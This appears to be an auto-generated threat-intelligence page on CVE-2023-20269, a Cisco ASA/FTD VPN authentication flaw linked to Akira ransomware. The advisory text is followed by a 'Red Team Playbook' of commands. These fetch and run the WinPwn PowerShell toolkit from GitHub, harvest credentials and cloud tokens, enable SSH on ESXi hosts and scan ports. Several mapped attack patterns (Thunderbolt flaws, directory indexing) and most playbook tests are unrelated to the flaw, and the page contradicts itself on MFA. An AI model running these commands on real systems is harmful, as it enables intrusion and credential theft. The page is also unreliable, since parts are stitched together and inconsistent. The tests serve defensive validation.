CVE-2023-20269
Overview
This vulnerability is an authentication logic flaw in the remote access VPN feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software. It arises from improper separation of authentication, authorization, and accounting (AAA) controls between the remote access VPN and HTTPS management or site-to-site VPN components. The root cause is that default connection profiles or tunnel groups can be specified during authentication attempts, allowing unauthorized access attempts to bypass proper AAA boundaries within the VPN subsystem.
Vulnerability Description
A vulnerability in the remote access VPN feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct a brute force attack in an attempt to identify valid username and password combinations or an authenticated, remote attacker to establish a clientless SSL VPN session with an unauthorized user. This vulnerability is due to improper separation of authentication, authorization, and accounting (AAA) between the remote access VPN feature and the HTTPS management and site-to-site VPN features. An attacker could exploit this vulnerability by specifying a default connection profile/tunnel group while conducting a brute force attack or while establishing a clientless SSL VPN session using valid credentials. A successful exploit could allow the attacker to achieve one or both of the following: Identify valid credentials that could then be used to establish an unauthorized remote access VPN session. Establish a clientless SSL VPN session (only when running Cisco ASA Software Release 9.16 or earlier). Notes: Establishing a client-based remote access VPN tunnel is not possible as these default connection profiles/tunnel groups do not and cannot have an IP address pool configured. This vulnerability does not allow an attacker to bypass authentication. To successfully establish a remote access VPN session, valid credentials are required, including a valid second factor if multi-factor authentication (MFA) is configured. Cisco will release software updates that address this vulnerability. There are workarounds that address this vulnerability.
Impact
An attacker without authentication can conduct brute force attacks to identify valid user credentials, which can then be used for unauthorized remote access VPN sessions. An attacker with valid credentials may establish clientless SSL VPN sessions using default tunnel groups, potentially bypassing intended access controls. This enables unauthorized network access, increasing the risk of lateral movement and data exposure within the affected network environment. Multi-factor authentication, if configured, remains effective and must be bypassed to exploit the vulnerability fully.
Solution
Cisco has released software updates addressing this vulnerability; affected Cisco ASA Software versions include 9.8.1 through 9.8.2.8. Administrators should apply the patches as detailed in Cisco Security Advisory cisco-sa-asaftd-ravpn-auth-8LyfCkeC available at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ravpn-auth-8LyfCkeC. Workarounds are also documented in the advisory for environments where immediate patching is not feasible.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Confirmed Groups
| Group | Victims | Source |
|---|---|---|
|
akira
|
1529 | ransomware.live |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
A significant vulnerability exists within the remote access VPN functionality of Cisco's Adaptive Security Appliance (ASA) Software and Firepower Threat Defense (FTD) Software. This flaw arises from an improper separation of authentication, authorization, and accounting (AAA) processes between the remote access VPN feature and other functionalities such as HTTPS management and site-to-site VPN. As a result, an unauthenticated remote attacker could potentially carry out brute force attacks to discover valid username and password combinations. Furthermore, an authenticated attacker could establish a clientless SSL VPN session, thereby gaining unauthorized access to the network.
Exploitation of this vulnerability can occur through two primary vectors. First, an attacker may attempt a brute force attack by targeting default connection profiles or tunnel groups, which are inadequately secured due to the AAA separation issue. This method allows attackers to systematically guess credentials until they successfully identify valid combinations. Second, if an attacker already possesses valid credentials, they could exploit the vulnerability to initiate a clientless SSL VPN session, particularly in environments running earlier versions of the ASA Software. While establishing a client-based remote access VPN tunnel is not feasible due to the lack of an IP address pool in these profiles, the ability to access the network through a clientless session still poses a significant risk.
The real-world implications of this vulnerability are profound, particularly for organizations relying on Cisco's VPN solutions for secure remote access. Successful exploitation could lead to unauthorized access to sensitive data, disruption of services, and potential compliance violations, especially in industries governed by strict data protection regulations. The high CVSS score of 9.1 indicates a critical risk level, suggesting that organizations must prioritize addressing this vulnerability to mitigate potential breaches that could result in financial loss, reputational damage, and legal consequences.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating Cisco ASA and FTD Software to the latest versions is crucial, as Cisco has committed to releasing patches that address this issue. Additionally, organizations should enhance their monitoring capabilities to detect unusual login attempts, particularly those indicative of brute force attacks. Implementing strong password policies and multi-factor authentication (MFA) can significantly reduce the risk of credential compromise. Furthermore, network segmentation can help limit the impact of any unauthorized access, ensuring that even if an attacker gains entry, their ability to move laterally within the network is restricted.
In conclusion, the vulnerabilities present in the remote access VPN feature of Cisco's ASA and FTD Software represent a critical risk that organizations must address promptly. By understanding the technical details, potential attack vectors, and real-world impacts, cybersecurity professionals can develop effective detection and mitigation strategies to protect their networks from unauthorized access and potential exploitation. The proactive management of this vulnerability is essential for maintaining the integrity and security of organizational data and systems.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2023-20269, with our telemetry indicating the first confirmed sighting of exploitation attempts targeting the vulnerability in Cisco ASA and FTD remote access VPN features. Although the EPSS score has slightly decreased, this shift does not diminish the critical nature of the vulnerability, especially given its confirmed association with ransomware groups such as Akira. The emergence of exploitation attempts underscores an increased operational interest by threat actors to leverage this flaw for unauthorized access and lateral movement within compromised networks. While no new exploit techniques have been publicly disclosed, the presence of ransomware-linked activity elevates the urgency for defenders to monitor for indicators of compromise tied to this vulnerability. Consequently, the threat level should be considered heightened due to active exploitation attempts, signaling a transition from theoretical risk to tangible adversary engagement.
Update 2 — May 21, 2026
CSURFACE threat intelligence has detected a marked reduction in exploitation attempts targeting CVE-2023-20269, reflected by a downward trend in telemetry signals associated with brute force and unauthorized VPN session activities. This decrease has prompted a reassessment of the vulnerability’s severity, resulting in a CVSS score adjustment from 9.1 to 5.0, indicating a lower immediate risk than previously assessed. Despite this, the EPSS score shows a slight upward trend, suggesting continued albeit limited potential for exploitation. The vulnerability remains linked to ransomware campaigns, notably those attributed to the Akira group, underscoring persistent adversary interest. For defenders, this shift signals a nuanced threat landscape where active exploitation is less frequent but not absent, necessitating ongoing vigilance without the heightened urgency implied by earlier assessments. Consequently, the overall threat level should be considered moderated but still relevant due to the vulnerability’s presence in ransomware-associated operations and its potential for unauthorized access.
Affected Products (246)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.1 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.1:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.1.5 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.1.5:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.1.7 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.1.7:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.2 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.2:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.2.8 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.2.8:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.2.14 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.2.14:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.2.15 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.2.15:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.2.17 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.2.17:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.2.20 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.2.20:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.2.24 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.2.24:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.2.26 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.2.26:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.2.28 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.2.28:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.2.33 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.2.33:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.2.35 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.2.35:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.2.38 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.2.38:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.3 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.3:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.3.8 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.3.8:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.3.11 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.3.11:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.3.14 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.3.14:*:*:*:*:*:*:*
|
|
|
Cisco | Adaptive Security Appliance Software | 9.8.3.16 |
cpe:2.3:o:cisco:adaptive_security_appliance_software:9.8.3.16:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Ransomware Groups 1
Threat Feed
6 eventsRansomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-665 | Exploitation of Thunderbolt Protection Flaws |
43%
|
Low | Very High | |
| CAPEC-127 | Directory Indexing |
30%
|
High | Medium |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-20269 |
| sec.cloudapps.cisco.com |
GitHub CVE
|
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ravpn-auth-8LyfCkeC |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-20269 |